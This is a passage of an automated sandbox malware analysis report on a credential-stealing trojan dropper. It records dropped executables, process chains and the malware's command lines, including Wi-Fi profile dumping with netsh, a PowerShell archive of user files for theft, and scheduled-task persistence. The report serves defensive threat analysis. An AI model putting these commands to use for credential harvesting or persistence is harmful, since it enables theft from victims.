Source: bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a9d75052-c
PE file contains section with special chars
Source: UeW2b6mU6Z.exe Static PE information: section name:
Source: UeW2b6mU6Z.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name: .idata
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name: .idata
Source: chrosha.exe.12.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEE227 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_00AEE227
Creates files inside the system directory
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Windows\Tasks\chrosha.job
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C8A220 0_2_00C8A220
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C84330 0_2_00C84330
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C794E3 0_2_00C794E3
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C88DBB 0_2_00C88DBB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C88EDB 0_2_00C88EDB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C88669 0_2_00C88669
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C44E60 0_2_00C44E60
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C847C8 0_2_00C847C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B1A220 1_2_00B1A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B14330 1_2_00B14330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B094E3 1_2_00B094E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B18DBB 1_2_00B18DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B18EDB 1_2_00B18EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AD4E60 1_2_00AD4E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B18669 1_2_00B18669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B147C8 1_2_00B147C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B1A220 2_2_00B1A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B14330 2_2_00B14330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B094E3 2_2_00B094E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B18DBB 2_2_00B18DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B18EDB 2_2_00B18EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AD4E60 2_2_00AD4E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B18669 2_2_00B18669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B147C8 2_2_00B147C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00ADDD40 6_2_00ADDD40
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B1A220 6_2_00B1A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B14330 6_2_00B14330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF24A3 6_2_00AF24A3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B18669 6_2_00B18669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B147C8 6_2_00B147C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF2C92 6_2_00AF2C92
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B18DBB 6_2_00B18DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B18EDB 6_2_00B18EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AD4E60 6_2_00AD4E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF5481 6_2_00AF5481
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B094E3 6_2_00B094E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF7822 6_2_00AF7822
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: String function: 00C59750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00B0A433 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEF620 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEEFE2 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AE9750 appears 367 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AE9090 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEECF8 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEECE3 appears 75 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 2108
Uses 32bit PE files
Source: UeW2b6mU6Z.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: UeW2b6mU6Z.exe Static PE information: Section: ZLIB complexity 0.9979945123994638
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979945123994638
Source: amert[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9979554063360881
Source: amert[1].exe.6.dr Static PE information: Section: mxcnarui ZLIB complexity 0.9946192586994986
Source: amert.exe.6.dr Static PE information: Section: ZLIB complexity 0.9979554063360881
Source: amert.exe.6.dr Static PE information: Section: mxcnarui ZLIB complexity 0.9946192586994986
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: 590971cd60.exe.6.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: sarra[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.991563424556213
Source: chrosha.exe.12.dr Static PE information: Section: ZLIB complexity 0.9979554063360881
Source: chrosha.exe.12.dr Static PE information: Section: mxcnarui ZLIB complexity 0.9946192586994986
Source: RageMP131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: MPGPH131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: UeW2b6mU6Z.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: explorha.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@108/150@20/15
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:512:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5804
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4584
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 590971cd60.exe, 00000014.00000003.2594923765.0000000007F59000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2895094368.0000000007F60000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2598755903.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599973969.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599301102.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2630675144.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE autofill_edge_extended ( name VARCHAR, value VARCHAR, guid VARCHAR, source INTEGER NOT NULL DEFAULT 0, PRIMARY KEY (name, value))L DEFAULT 0, use_date INTEGER NOT NULL DEFAULT 0, date_modified INTEGER NOT NULL DEFAULT 0)ount INTEGER NOT NULL DEFAULT 0, use_date INTEGER NOT NULL DEFAULT 0)R DEFAULT 0, card_art_url VARCHAR)R DEFAULT 0, last_name_status INTEGER DEFAULT 0, first_last_name_status INTEGER DEFAULT 0, conjunction_last_name_status INTEGER DEFAULT 0, second_last_name_status INTEGER DEFAULT 0, full_name_status INTEGER DEFAULT 0, full_name_with_honorific_prefix VARCHAR, full_name_with_honorific_prefix_status INTEGER DEFAULT 0)0, zip_code_status INTEGER DEFAULT 0, sorting_code_status INTEGER DEFAULT 0, country_code_status INTEGER DEFAULT 0, apartment_number VARCHAR, floor VARCHAR, apartment_number_status INTEGER DEFAULT 0, floor_status INTEGER DEFAULT 0)c`~;
Source: rundll32.exe, 00000008.00000002.2527620455.0000022BD7150000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582192926.0000000007F4D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722662732.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: UeW2b6mU6Z.exe ReversingLabs: Detection: 39%
Source: UeW2b6mU6Z.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File read: C:\Users\user\Desktop\UeW2b6mU6Z.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\UeW2b6mU6Z.exe "C:\Users\user\Desktop\UeW2b6mU6Z.exe"
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,11986883696083450326,11027901686881542534,262144 /prefetch:8
Source: unknown Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3476 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 2108
Source: unknown Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe"
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 2156
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4752 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe"
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe" Jump to behavior
